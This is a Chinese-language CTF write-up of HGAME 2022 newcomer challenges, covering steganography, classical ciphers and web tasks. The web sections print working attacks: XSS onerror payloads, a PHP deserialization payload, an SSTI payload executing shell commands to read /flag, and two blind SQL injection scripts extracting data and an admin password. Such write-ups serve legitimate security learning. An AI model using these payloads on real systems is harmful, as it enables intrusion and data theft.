新人赛,就没有存题目附件了,简单的记录一下解题过程吧
Level - Week1
WEB
easy_auth
存在admin
用户,随便设置一个任务,然后点击doing
,抓一个GET
的包
Token的格式很明显是jwt
:https://jwt.io/
修改ID
为1
,Username
为admin
发送修改后的jwt
密文得到flag
蛛蛛…嘿嘿♥我的蛛蛛
import requests
import re
init_url = "https://hgame-spider.vidar.club/8983cb3acd"
link = ""
while True:
res_url = init_url + link
regex = re.compile('href="(.*?)"')
html = requests.get(url=res_url)
l = re.findall(regex, html.text)
print(res_url)
link = [i for i in l if i != '']
if len(link) == 0:
break
else:
link = link[0]
访问最后一个输出的地址,flag在响应头里面
Tetris plus
在cheking.js
中发现注释了jsfuck
直接复制到控制台回车即可得到flag
Fujiwara Tofu Shop
GET / HTTP/1.1
Host: shop.summ3r.top
User-Agent: Hachi-Roku
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
referer:qiumingshan.net
Cookie: flavor=Raspberry;
gasoline:100
x-real-ip:127.0.0.1
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
MISC
欢迎欢迎!热烈欢迎!
hgame{We1com3_t0_HG@ME_2O22}
这个压缩包有点麻烦
README.txt
I don't know if it's a good idea to write down all the passwords.
将password-note.txt
作为字典进行爆破
明文攻击
分离出来的压缩包跟一般伪加密不同的是修改了压缩源文件数据区的全局方式标记位
,使得7z
等压缩包无法无视伪加密直接解压
修改压缩源文件目录区全局方式标记位
为偶数即可
hgame{W0w!_y0U_Kn0w_z1p_3ncrYpt!}
好康的流量
hgame{ez_1mg_
另一半flag用zsteg
查看一下LSB
hgame{ez_1mg_Steg4n0graphy}
群青(其实是幽灵东京)
通过频谱图得到密码:Yoasobi
音频LSB隐写,SlientEye
解码得到一个地址
听起来是SSTV,Robot36
直接听
hgame{1_c4n_5ee_the_wav}
CRYPTO
Dancing Line
向X
轴方向移动一个像素点记为0
,向Y
轴方向移动一个像素点记为1
from PIL import Image
img = Image.open('flag.bmp')
width, height = img.size
bin_data = ''
num_list = []
n = 0
for w in range(width):
for h in range(height):
pix = img.getpixel((w,h))
if pix != (255, 255, 255):
#print("{} {}".format(pix, n))
num_list.append(n)
n += 1
for i in range(len(num_list)-1):
if (num_list[i+1] - num_list[i]) >= height:
bin_data += '0'
else:
bin_data += '1'
print("[+]binary data: {}".format(bin_data))
flag = ''
for i in range(0, len(bin_data), 8):
flag += chr(int(bin_data[i:i+8], 2))
print(flag)
PS C:\Users\Administrator\Downloads> python .\code.py
[+]binary data: 01101000011001110110000101101101011001010111101101000100011000010110111001100011001100010110111001100111010111110100110000110001011011100110010101011111001100010011010101011111011001100111010101101110001011000101111100110001001101010110111000100111011101000101111100110001011101000011111101111101
hgame{Danc1ng_L1ne_15_fun,_15n't_1t?}
Matryoshka
类似盲文,但是其实是摩斯码
- 将
⠨
替换为.
- 将
⠤
替换为-
- 将
⠌
替换为/
然后逆序处理
466642756645466E6D4C73364433736959744C3658327034694E306364536C796B6D3972514E396F4D53316A6B7339724B3252366B4C38686F72303D
Hex转字符得到:
FfBufEFnmLs6D3siYtL6X2p4iN0cdSlykm9rQN9oMS1jks9rK2R6kL8hor0=
维吉尼亚解密(密钥为:hgame)得到:
YzBibXZnaHl6X3swUmF6X2d4eG0wdGhrem9fMG9iMG1fdm9rY2N6dF8hcn0=
base64解码得到:
c0bmvghyz_{0Raz_gxxm0thkzo_0ob0m_vokcczt_!r}
栅栏密码(每组字数:22)得到:
cbvhz{Rzgx0hz_o0_ocz_r0mgy_0a_xmtko0bmvkct!}
凯撒密码解密(位移21)得到:
hgame{Welc0me_t0_the_w0rld_0f_crypt0graphy!}
English Novel
根据给出的密文,明文,以及加密算法,推出key,然后利用key解flag.enc
import os
def if_length(ori_content, enc_content, match_result):
if len(ori_content) == len(enc_content):
match_result = True
else:
match_result = False
return match_result
def if_match(ori_name, enc_name):
match_result = True
ori_path = ori_folder + '/' + ori_name
enc_path = enc_folder + '/' + enc_name
with open(ori_path, 'r') as f:
ori_content = f.read()
with open(enc_path, 'r') as f:
enc_content = f.read()
match_result = True
if match_result:
match_result = if_length(ori_content, enc_content, match_result)
if match_result:
for i in range(len(ori_content)):
if ori_content[i] == enc_content[i]:
continue
elif ori_content[i].isupper() and enc_content[i].isupper():
continue
elif ori_content[i].islower() and enc_content[i].islower():
continue
else:
match_result = False
return match_result
def match_process(ori_folder, enc_folder):
all_match = []
original_list = os.listdir(ori_folder)
encrypt_list = os.listdir(enc_folder)
for ori_name in original_list:
for enc_name in encrypt_list:
match_result = if_match(ori_name, enc_name)
if match_result:
ori_path = ori_folder + '/' + ori_name
enc_path = enc_folder + '/' + enc_name
match_group = [ori_path, enc_path]
all_match.append(match_group)
encrypt_list.remove(enc_name)
else:
continue
return all_match
def decrypt(ori_data, enc_data, enc_flag):
keys = []
for i in range(len(enc_data)):
key = ord(enc_data[i]) - ord(ori_data[i])
keys.append(key)
result = ""
enc_data = enc_flag
for i in range(len(enc_data)):
if enc_data[i].isupper():
result += chr((ord(enc_data[i]) - ord('A') - keys[i]) % 26 + ord('A'))
elif enc_data[i].islower():
result += chr((ord(enc_data[i]) - ord('a') - keys[i]) % 26 + ord('a'))
else:
result += enc_data[i]
return result
if __name__ == '__main__':
ori_folder = './original'
enc_folder = './encrypt'
enc_flag = open('./flag.enc', 'r').read()
match_list = match_process(ori_folder, enc_folder)
for match_group in match_list:
with open(match_group[0], 'r') as f:
ori_data = f.read()
with open(match_group[1], 'r') as f:
enc_data = f.read()
flag = decrypt(ori_data, enc_data, enc_flag)
print("{:<30}{:<30}{:<30}".format(match_group[0], match_group[1], flag))
hgame{D0_y0u_kn0w_'Kn0wn-pla1ntext_attack'?}
Level - Week2
WEB
Apache!
CVE-2021-40438
webpack-engine
- webpack解析之详细过程:https://www.freebuf.com/articles/web/276810.html
这里倒是不用还原map文件,直接访问这个
data:application/json;base64,eyJ2ZXJzaW9uIjozLCJzb3VyY2VzIjpbIndlYnBhY2s6Ly8uL3NyYy92aWV3cy9GbDRnXzFzX2hlcjMudnVlIl0sIm5hbWVzIjpbXSwibWFwcGluZ3MiOiI7QUF5QkE7RUFDQSxZQUFBO0VBQ0Esa0JBQUE7RUFDQSxhQUFBO0VBQ0Esc0JBQUE7RUFDQSx1QkFBQTtFQUNBLG1CQUFBO0FBQ0E7QUFDQTtFQUNBLFdBQUE7RUFDQSxZQUFBO0VBQ0EsYUFBQTtFQUNBLHNCQUFBO0VBQ0EsdUJBQUE7RUFDQSxtQkFBQTtBQUNBO0FBQ0E7RUFDQSxXQUFBO0VBQ0EsWUFBQTtBQUNBOztBQUVBLFFBQUE7QUFDQTtFQUNBLHNCQUFBO0VBQ0EsdUJBQUE7RUFDQSxxQkFBQTtFQUNBLHNCQUFBO0VBQ0EsY0FBQTtFQUNBLGVBQUE7RUFDQSxxQkFBQTtFQUNBLDhMQUFBO0VBQ0EsaUJBQUE7RUFDQSxnQkFBQTtFQUNBLGNBQUE7RUFDQSxvQkFBQTtFQUNBLGtCQUFBO0VBQ0EsbUNBQUE7RUFDQSwrQkFBQTtFQUNBLDhDQUFBO0VBQ0EsaURBQUE7RUFDQSxpQkFBQTtFQUNBLHlCQUFBO0VBQ0EsMEJBQUE7QUFDQTtBQUVBO0VBQ0EseUJBQUE7RUFDQSxXQUFBO0VBQ0EsK0JBQUE7QUFDQTtBQUVBO0FBQ0E7SUFDQSxtQkFBQTtJQUNBLGtCQUFBO0FBQ0E7QUFDQTtBQUVBO0VBQ0Esa0JBQUE7RUFDQSxZQUFBO0VBQ0EsWUFBQTtFQUNBLFdBQUE7RUFDQSxZQUFBO0FBQ0EiLCJzb3VyY2VzQ29udGVudCI6WyI8dGVtcGxhdGU+XG4gIDxoMT57e2ZpbGlpaWxpbGlsNGd9fTwvaDE+XG48L3RlbXBsYXRlPlxuXG48c2NyaXB0PlxuXG5leHBvcnQgZGVmYXVsdCB7XG4gIGRhdGEoKSB7XG4gICAgcmV0dXJuIHtcbiAgICAgIGZpbGlpaWxpbGlsNGc6ICdZVWRrYUdKWFZqZFNSRUoxWkVZNWJVMUlTVFZhV0ZKbVRXdzVSR0pGT1hwTk1UbFVUVWhXZVZreVZtWmlWVUozWmxFOVBRbz0nXG4gICAgfVxuICB9XG59XG48L3NjcmlwdD5cblxuPHN0eWxlPlxuaHRtbCwgYm9keSB7XG4gIGhlaWdodDogMTAwJTtcbiAgbWFyZ2luOiAwO1xuICBwYWRkaW5nOiAwO1xuICBvdmVyZmxvdzogaGlkZGVuO1xufVxuPC9zdHlsZT5cblxuPHN0eWxlIHNjb3BlZD5cbi5ob21lIHtcbiAgaGVpZ2h0OiAxMDAlO1xuICBwb3NpdGlvbjogcmVsYXRpdmU7XG4gIGRpc3BsYXk6IGZsZXg7XG4gIGZsZXgtZGlyZWN0aW9uOiBjb2x1bW47XG4gIGp1c3RpZnktY29udGVudDogY2VudGVyO1xuICBhbGlnbi1pdGVtczogY2VudGVyO1xufVxuLnBsYXllciB7XG4gIHdpZHRoOiAxMDAlO1xuICBoZWlnaHQ6IDEwMCU7XG4gIGRpc3BsYXk6IGZsZXg7XG4gIGZsZXgtZGlyZWN0aW9uOiBjb2x1bW47XG4gIGp1c3RpZnktY29udGVudDogY2VudGVyO1xuICBhbGlnbi1pdGVtczogY2VudGVyO1xufVxuaWZyYW1lIHtcbiAgd2lkdGg6IDEwMCU7XG4gIGhlaWdodDogMTAwJTtcbn1cblxuLyogQ1NTICovXG4uYnV0dG9uLTgxIHtcbiAgYmFja2dyb3VuZC1jb2xvcjogI2ZmZjtcbiAgYm9yZGVyOiAwIHNvbGlkICNlMmU4ZjA7XG4gIGJvcmRlci1yYWRpdXM6IDEuNXJlbTtcbiAgYm94LXNpemluZzogYm9yZGVyLWJveDtcbiAgY29sb3I6ICMwZDE3MmE7XG4gIGN1cnNvcjogcG9pbnRlcjtcbiAgZGlzcGxheTogaW5saW5lLWJsb2NrO1xuICBmb250LWZhbWlseTogXCJCYXNpZXIgY2lyY2xlXCIsLWFwcGxlLXN5c3RlbSxzeXN0ZW0tdWksXCJTZWdvZSBVSVwiLFJvYm90byxcIkhlbHZldGljYSBOZXVlXCIsQXJpYWwsXCJOb3RvIFNhbnNcIixzYW5zLXNlcmlmLFwiQXBwbGUgQ29sb3IgRW1vamlcIixcIlNlZ29lIFVJIEVtb2ppXCIsXCJTZWdvZSBVSSBTeW1ib2xcIixcIk5vdG8gQ29sb3IgRW1vamlcIjtcbiAgZm9udC1zaXplOiAxLjFyZW07XG4gIGZvbnQtd2VpZ2h0OiA2MDA7XG4gIGxpbmUtaGVpZ2h0OiAxO1xuICBwYWRkaW5nOiAxcmVtIDEuNnJlbTtcbiAgdGV4dC1hbGlnbjogY2VudGVyO1xuICB0ZXh0LWRlY29yYXRpb246IG5vbmUgIzBkMTcyYSBzb2xpZDtcbiAgdGV4dC1kZWNvcmF0aW9uLXRoaWNrbmVzczogYXV0bztcbiAgdHJhbnNpdGlvbjogYWxsIC4xcyBjdWJpYy1iZXppZXIoLjQsIDAsIC4yLCAxKTtcbiAgYm94LXNoYWRvdzogMHB4IDFweCAycHggcmdiYSgxNjYsIDE3NSwgMTk1LCAwLjI1KTtcbiAgdXNlci1zZWxlY3Q6IG5vbmU7XG4gIC13ZWJraXQtdXNlci1zZWxlY3Q6IG5vbmU7XG4gIHRvdWNoLWFjdGlvbjogbWFuaXB1bGF0aW9uO1xufVxuXG4uYnV0dG9uLTgxOmhvdmVyIHtcbiAgYmFja2dyb3VuZC1jb2xvcjogIzFlMjkzYjtcbiAgY29sb3I6ICNmZmY7XG4gIHRyYW5zaXRpb246IGFsbCAuMnMgZWFzZS1pbi1vdXQ7XG59XG5cbkBtZWRpYSAobWluLXdpZHRoOiA3NjhweCkge1xuICAuYnV0dG9uLTgxIHtcbiAgICBmb250LXNpemU6IDEuMTI1cmVtO1xuICAgIHBhZGRpbmc6IDFyZW0gMnJlbTtcbiAgfVxufVxuXG5idXR0b24ge1xuICBwb3NpdGlvbjogYWJzb2x1dGU7XG4gIHdpZHRoOiAzMDBweDtcbiAgaGVpZ2h0OiA2MHB4O1xuICBib3R0b206IDIwJTtcbiAgYm9yZGVyOiBub25lO1xufVxuPC9zdHlsZT5cbiJdLCJzb3VyY2VSb290IjoiIn0=
>>> from base64 import *
>>> b64decode('YUdkaGJXVjdSREJ1ZEY5bU1ISTVaWFJmTWw5RGJFOXpNMTlUTUhWeVkyVmZiVUJ3ZlE9PQo=')
b'aGdhbWV7RDBudF9mMHI5ZXRfMl9DbE9zM19TMHVyY2VfbUBwfQ==\n'
>>> b64decode('aGdhbWV7RDBudF9mMHI5ZXRfMl9DbE9zM19TMHVyY2VfbUBwfQ==')
b'hgame{D0nt_f0r9et_2_ClOs3_S0urce_m@p}'
At0m的留言板
直接获取类名元素为content的
flag
是通过var
声明的,那么直接列出当前页面的所有的全局变量
这样就可以得到flag的值了,接下来就是xss触发,简单测试下发现过滤并不多,直接使用
<img src=x onerror="document.getElementsByClassName('content')[0].innerText=Object.keys(window)">
<img src=x onerror="document.getElementsByClassName('content')[0].innerText=F149_is_Here">
一本单词书
下载源码,登录这里绕过is_numeric()
即可,bypass网上方法很多
username=adm1n&password=1080%00
继续分析源码
{
"name":"mochu7"
}
可以看到对键值的内容进行了序列化存储,键名内容不变,中间用|
分隔
继续分析源码
重点在这里的decode
函数,对|
后部分的数据进行反序列化,但是如果键名部分也有|
符号,就会对键名|
之后的部分反序列化
<?php
class Evil {
public $file='/flag';
}
$obj = new Evil();
var_dump(serialize($obj));
//O:4:"Evil":1:{s:4:"file";s:5:"/flag";}
?>
name|O:4:"Evil":1:{s:4:"file";s:5:"/flag";}
Pokemon
error.php
对传入的code
参数进行了过滤
fuzz一下sql关键字,长度为473的包都是被过滤的
不过这里的过滤是直接替换为空,可双写绕过
可进行时间盲注,过滤的地方用双写绕过即可
import requests
printable_str = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~"
burp0_url = "http://121.43.141.153:60056/error.php?code="
burp0_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
result = ""
for i in range(50):
for s in printable_str:
# payload = "if(ascii(mid(database(),{},1))like({}),sleep(1),1)".format(i, ord(s))
# payload = "if(ascii(mid((selselectect/*/**/*/group_concat(table_name)/*/**/*/frfromom/*/**/*/infoorrmation_schema.tables/*/**/*/whewherere/*/**/*/(table_schema)like('pokemon')),{},1))like({}),sleep(1),0)".format(i, ord(s))
# payload = "if(ascii(mid((selselectect/*/**/*/group_concat(column_name)/*/**/*/frfromom/*/**/*/infoorrmation_schema.columns/*/**/*/whewherere/*/**/*/(table_name)like('fllllllllaaaaaag')),{},1))like({}),sleep(1),0)".format(i, ord(s))
payload = "if(ascii(mid((selselectect/*/**/*/flag/*/**/*/frfromom/*/**/*/pokemon.fllllllllaaaaaag),{},1))like({}),sleep(1),1)".format(i, ord(s))
resp = requests.get(url=burp0_url+payload, headers=burp0_headers)
if resp.elapsed.seconds > 3:
result += s
print("[+]{}".format(result))
else:
continue
MISC
一张怪怪的名片
PS
打开,用钢笔选中每块选区,然后拼起来,加大曝光,得到如下
直接扫不出来,二维码中间貌似被涂黑过,有点干扰。尝试用二维码修复站模糊识别:https://merricx.github.io/qrazybox/
看样子像是一个链接,用搜索引擎语法找
找到出题人的github,在github首页找到出题人的博客地址
然后在出题人博客的友联里面找到了鸿贵安
https://homeginan.homeboyc.cn
b09nyMj9cOZ3aB8KUcnh46nIi9fGTIL6XjnnW1/sj/nUR1BFYkf0JwB0qjcQhcCy7dxtsHqznOMkt6XEGKD8y5K5whenAcwuiT/Rue+snORVWAorXsB3ZGcITuFLEIThbx4/vh5E/Wk4R8qhNcFh5bwSSmwdULVuwBrJ5H3+kBOsYafEqP8RDX3sOdXTj80V8Puq+TNbXAMhxvdLGkkcBQ==
b09nyMj9cOZ3aB8KUcnh46nIi9fGTIL6XjnnW1/sj/nUR1BFYkf0JwB0qjcQhcCylCR8cGp6MhxD4pTEACGutFVYCitewHdkZwhO4UsQhOFvHj++HkT9aThHyqE1wWHlvBJKbB1QtW7AGsnkff6QE+wqMT6fADfdpBQNOzg4DYA=
Derive PBKDF2 key
的passphrase
要猜,根据博客上给出的信息
那么生日应该是:20020816
试了一下发现还不对,最后经过多次尝试得到密码为:hgame20020816
hgame{Wh0_4m_1?I_like_S0ciaI_En9in33ring}
你上当了 我的很大
第一步套娃解压,Python脚本简单处理下即可
import zipfile
import os
def decompress(files_list:list) -> list:
dec_files_list = []
for file_name in files_list:
if '.zip' in file_name:
zf = zipfile.ZipFile(file_name)
zf.extractall(os.getcwd())
dec_files_list += zf.namelist()
else:
continue
return dec_files_list
if __name__ == '__main__':
files_list = os.listdir()
while True:
dec_files_list = decompress(files_list)
if len(dec_files_list) == 0:
break
else:
files_list = dec_files_list
得到三个经典视频,在agfl.mp4
和lagf.mp4
的视频末尾有条码
结合提示给的两个条码
给了图床链接的两个条码用下面这个识别:
另外两个用另一个条码识别工具站:
一共得到四张base64编码过的图片字节流
- https://the-x.cn/zh-cn/base64/(base64解码,可识别解码后的文件类型)
将得到的四张图片用PS
简单拼接一下即可
hgame{Do_y0U_lIk3_MazE5?}
Level - Week3
MISC
卡中毒
查看浏览器历史记录找到个7z压缩包
导出、解压发现是WannaRen勒索病毒
加密的文件
一键解密 火绒推出WannaRen勒索病毒解密工具:https://www.huorong.cn/info/1586440740454.html
得到新佛曰论禅编码
新佛曰:諸隸僧降閦吽諸陀摩閦隸僧缽薩閦願耨願嘚願諦閦諸囉閦嘇劫嘇閦亦伏迦薩摩愍心薩摩降眾閦聞諸阿我閦嚩諸寂嘚咒咒莊閦我薩闍嚩劫閦嘇薩迦聞色須嘇聞我吽伏閦是般如閦
新佛曰论禅解码:http://hi.pcmoe.net/buddha.html
hgame{F1srt_STep_0f_MeM0rY_F0renS1cs}
谁不喜欢猫猫呢
每隔10个像素点就有一个像素位置比较突出
有点像缩略图,通过stegsolve也可发现确实是有一些信息,很有规律的排布,用Python简单提取下即可
from PIL import Image
img = Image.open('1.png')
width, height = img.size
pixs_list = []
for w in range(5, width, 11):
for h in range(5, height, 11):
pix = img.getpixel((w, h))
pixs_list.append(pix)
#分解下pixs_list的长度,就可以得到生成图片的宽高
new_width, new_height = 215, 215
new_img = Image.new('RGB', (new_width, new_height))
idx = 0
for n_w in range(new_width):
for n_h in range(new_height):
new_img.putpixel((n_w, n_h), pixs_list[idx])
idx += 1
new_img.save('ok.png')
new_img.show()
得到信息
st = 1
a = 9
b = 39
暂时不知道什么意思,图片上有一些带颜色小点很突出,拖进PS分析发现间隔也是很规律,每个点间隔4个像素点
from PIL import Image
img = Image.open('ok.png')
width, height = img.size
pixs_list = []
for w in range(2, width, 5):
for h in range(2, height, 5):
pix = img.getpixel((w, h))
pixs_list.append(pix)
#分解pixs_list的长度,
new_width, new_height = 43, 43
new_img = Image.new('RGB', (new_width, new_height))
idx = 0
for n_w in range(new_width):
for n_h in range(new_height):
new_img.putpixel((n_w, n_h), pixs_list[idx])
idx += 1
new_img.save('ok1.png')
new_img.show()
看到这里了看过Arnold变换(猫映射)
置乱效果图的师傅应该会觉得比较像,前面的到a=9、b=39
是Arnold变换
矩阵参数,st=1
是周期
from PIL import Image
img = Image.open('ok1.png')
if img.mode == "P":
img = img.convert("RGB")
assert img.size[0] == img.size[1]
dim = width, height = img.size
st = 1
a = 9
b = 39
for _ in range(st):
with Image.new(img.mode, dim) as canvas:
for nx in range(img.size[0]):
for ny in range(img.size[0]):
y = (ny - nx * a) % width
x = (nx - y * b) % height
canvas.putpixel((y, x), img.getpixel((ny, nx)))
canvas.show()
canvas.save('ok2.png')
很像nipet
,尝试npiet
执行一下
原图是附加了一个zip的字节流的,分离出来得到两个list,根据提示把每一项的加起来
from binascii import *
list1 = [776686, 749573, 6395443, 2522866, 279584, 587965, 4012670, 1645156, 2184634]
list2 = [6065523, 6419830, 1421837, 5103682, 5963053, 2842996, 1113825, 1594064, 4578755]
flag = ''
for i in range(len(list1)):
flag += unhexlify(hex(list1[i]+list2[i])[2:]).decode()
print(flag)
hgame{wH@t_4_AM4Z1N9_1m4g3}
PS:这样的最后处理得到flag,感觉会有挺多的非预期
WEB
SecurityCenter
一开始以为是SSRF,打了半天在hint提供的信息最下面发现了这个
测试一下
Twing v3.3.7
的模板,找下漏洞
SSTI payload
{{["id"]|map("system")}}
{{["id"]|map("passthru")}}
{{["id"]|map("exec")}} // 无回显
尝试读取的时候发现过滤了cat
,简单绕过一下即可
返回内容不能有hgame
?
base64编码一下返回
/redirect.php?url={{["head /flag | base64"]|map("system")}}
然后这里记录一下我一开始使用的读取方法
redirect.php?url={{["/usr/local/bin/php /flag | base64"]|map("system")}}
PS C:\Users\Administrator> php -r "var_dump(base64_decode('aGdhbWV7IVR3MTktUzV0MX4xc15zMDBPME9faW50ZXIzc3QxbjV+IX0K'));"
Command line code:1:
string(42) "hgame{!Tw19-S5t1~1s^s00O0O_inter3st1n5~!}"
Vidar shop demo
这三个js文件都有map文件,可以用reverse-sourcemap
还原源码
参考:https://www.freebuf.com/articles/web/276810.html
得到源码可自行分析
不过这里的漏洞,黑盒就测试出来了
注册的时候注意下有一些限制,最好用burp改包注册,注意用户名长度和密码长度即可成功注册
注册成功后登录能看到用户的一些信息
首先任意下单一个买得起的,支付,看看这个过程
支付后,账户拥有的余额减少了20
然后发现这个已支付的订单可以删除
删除完之后发现,之前减去的余额返回到了账户
有增加对应取消订单的价格,抓包分析下传参
只传了一个订单的id,尝试修改为下单好的更大金额的订单的id,比如flag的订单id
增加了flag订单的金额到账户余额上,余额够了,直接买flag,支付后回到订单页面得到flag
LoginMe
本次HGAME唯一一道拿到血的题目呜呜呜,虽然是三血,纪念一下
源码里面给了个hint的图片
username
只有admin和test两个用户,并且可以闭合这里形成注入
{"username":"admin' and '1","password":"mochu7"}
这里需要注意的是,注入语法正常的时候返回:{"msg":"success!"}
,注入语法错误,或者用户名错误的都返回:{"msg":"invalid username or password"}
比较难测试区分的就是分辨是注入语句不对,还是这个关键字被过滤了,因为都是返回{"msg":"invalid username or password"}
,得一点点摸索
经过多次测试发现这里if
应该是行不通的
那么可以参考我以前的文章:记一次MySQL注入绕过
利用case when [express] then [x] else [y] end
代替if做条件判断
{"username":"admin'and case when 1=1 then 1 else 0 end and '1","password":"mochu7"}
直接查admin的password
import requests
asc_str = '0123456789abcdef'
burp0_url = "http://81906c3039.login.summ3r.top:60067/login"
burp0_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0",
"Accept": "application/json, text/plain, */*",
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "application/json"}
password = ""
for i in range(1, 35):
for s in asc_str:
payload = "admin'and case when substr(password,{},1)='{}' then 1 else 0 end and '1".format(i, s)
burp0_json={"password": "mochu7", "username": payload}
resp = requests.post(burp0_url, headers=burp0_headers, json=burp0_json)
if 'success' in resp.text:
password += s
print(password)
登录admin账号,然后得到flag
Level - Week4
MISC
摆烂
从结构上来看应该是apng
,用apng disassembler
分离
看起来一样的图片,大小不一样,猜测盲水印
得到压缩包密码:4C*9wfg976
拼图,用PS
将得到的二维码用二维码在线站扫:https://products.aspose.app/barcode/recognize#
零宽度字符隐写:https://330k.github.io/misc_tools/unicode_steganography.html
hgame{1_W4nT_T0_p1Ay_r0Tten}
At0m的给你们的(迟到的)情人节礼物
题目附件是RAR压缩的,使用winrar
解压
ntfsstreamseditor
扫一下,发现NTFS流隐藏的文件
秋名山车神Atom开车啦
4 up left down up right down up left up down right down up left down up right down up left up down right down up left down up right up down left up down right down up left down up right down up left up down right down up left up down down up up down right down up left up down right up down left up down right down up left up down right up
gift.mp4
视频中,出题人切屏的时候得到一个信息
gift2.avi
极大可能使用了msu steg
,但是msu steg
解视频文件需要一个数字密码
NTFS流隐藏的文件提到的是开车,然后一个4开头,之后就是上下左右的方向,用笔画了一下
画来画去得到一个H形状,联想到提到车,猜测可能是手动挡车的挡位
从4
档开始,始终在1-4
档移动,猜测可能是四进制,把移动过程中经过的挡位记录下来
得到一串数字,Python简单处理得到一串数字
from binascii import *
data = '424142414231424141214131413'
quater_num = ''
for n in data:
quater_num += str(int(n)-1)
flag = unhexlify(hex(int(quater_num, 4))[2:])
print(flag)
PS C:\Users\Administrator\Downloads\gift\gift> python .\code.py
b'7767122'
MSU Stego
hgame{Q1ng_R3n_J1e_Da_Sh4_CTF}